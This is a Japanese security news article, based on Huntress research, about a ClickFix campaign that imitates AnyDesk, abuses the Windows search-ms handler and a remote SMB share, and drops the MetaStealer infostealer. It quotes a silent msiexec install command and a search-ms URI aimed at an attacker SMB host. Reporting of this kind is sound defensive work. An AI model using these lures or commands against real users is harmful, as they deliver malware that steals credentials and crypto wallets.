新たな ClickFix 攻撃を検出:AnyDesk を装い MetaStealer マルウェアを拡散

New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer

2025/09/02 CyberSecurityNews — 新たに検出された ClickFix の亜種が、正規の AnyDesk インストーラーを装いながら、情報窃取マルウェア MetaStealer を拡散している。この攻撃者は、偽の Cloudflare Turnstile 認証ページを介してユーザーを誘導し、細工された Windows プロトコル・ハンドラを実行させるものだ。そして最終的には、PDF に偽装された悪意の MSI パッケージを配信していく。

ユーザー組織はソーシャル・エンジニアリングに対する防御を、従来からの手法で強化し続けている。その一方で、脅威アクターたちは手口を進化させ、使い慣れたルアーと予期せぬシステム・コンポーネントの組み合わせにより、検出を回避しながら機密性の高い認証情報を窃取している。

2025年8月の初旬も、AnyDesk を検索していたユーザーが、”anydeesk[.]ink/download/anydesk.html” という偽のランディング・ページに遭遇した。このページには、標準的な Cloudflare Turnstile のプロンプトが表示され、”人間であることを確認してください” ボタンが表示されていた。

The initial link that redirects users to a fake Cloudflare Turnstile (Source – Huntress)

従来からの ClickFix 攻撃は、”ファイル名を指定して実行” ダイアログにコマンドを貼り付けるものだったが、この攻撃では、”search-ms” URI ハンドラを介して Windows File Explorer へのリダイレクトが用いられている。Huntress の研究者たちが指摘するのは、このリダイレクトにより、監視の少ない Windows Search プロトコルが悪用され、セキュリティ・チームが不意を突かれたことだ。

Windows File Explorer Redirection via search-ms (Source – Huntress)

この感染チェーンは、”search-ms” URI がリモート SMB 共有を呼び出すことで展開され、”Readme Anydesk.pdf.lnk” という Windows ショートカットが被害者に配信される。

従来の ClickFix (FileFix) 亜種がクリップボード経由で PowerShell コマンドを利用していたのに対し、この攻撃は LNK ペイロードを自動起動し、スクリプトを実行させ、2つのコンポーネントをダウンロード/インストールする。1つ目のコンポーネントは、Microsoft Edge にホストされる正規の AnyDesk インストーラーであり、もう1つは、”chat1[.]store” から提供される偽装 PDF である。

この偽装 PDF の実体は MSI パッケージであり、”%COMPUTERNAME%” 環境変数を悪用することで、被害者のホスト名をダウンロード URL に動的に組み込む。このインストールは、以下のコマンドで実行される。

msiexec /i "%TEMP%\%%COMPUTERNAME%%.msi" /quiet

悪意の MSI インストール後に、2つの主要アーティファクトが生成される。1つはセットアップのオーケストレーションを行う “CustomActionDLL” であり、もう1つは MetaStealer ドロッパーである “ls26.exe” と、クリーンアップ・スクリプトを取り込んだ CAB アーカイブである。

Displayname Parameter Revealing SMB Share (Source – Huntress)

Huntress アナリストたちの分析によると、”ls26.exe” は Private EXE Protector で保護されており、ブラウザ認証情報や暗号ウォレットの窃取といった、MetaStealer の典型的な動作を示すことが突き止められた。

感染メカニズム

このキャンペーンのコアは、Windows Search の巧妙な利用にある。”search-ms” URI プロトコルを呼び出すことで、攻撃者は実行ダイアログ制限を回避し、File Explorer から直接ペイロードを挿入する。

以下の URI スニペットはリダイレクト例である。

search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share

ユーザーが File Explorer のプロンプトを確認すると、LNK ファイルはダウンロード・ルーチンをサイレント実行する。続いて MSI の “CustomActionDLL” は “Binary.bz.WrappedSetupProgram” の取得をトリガーし、”ls26.exe” と “1.js” を解凍する。さらに、JavaScript により中間ファイルは削除され、”ls26.exe” がデータ窃取フェーズを開始する。

この攻撃は、正規の Windows プロトコルとファイル処理を悪用することで、サンドボックスやセキュリティ・アラートを回避し、最終ペイロードによる悪意の動作を展開するものだ。この新たな戦術が浮き彫りにするのは、信頼されたシステム機能の非標準的な拡張を監視することの重要性である。

これら高度なソーシャル・エンジニアリング・キャンペーンを検出/阻止するために、防御側にとって必要なことは、プロトコル・ハンドラ・ポリシーの厳格化/SMB 監査/MSI インストールのコンテキスト分析の実装などの検討である。

新たに発見された ClickFix の亜種が、正規の AnyDesk インストーラーを装いながら、MetaStealer を配布しているようです。この攻撃の原因は、Windows の “search-ms” プロトコル・ハンドラや File Explorer の動作を悪用する点にあります。それらは正規のシステム機能ですが、適切に検証されない URI 呼び出しやファイル抽出の流れが、攻撃者にとって悪用可能な経路となっています。このマルウェアは、要注意ですね。よろしければ、ClickFix で検索も ご参照ください。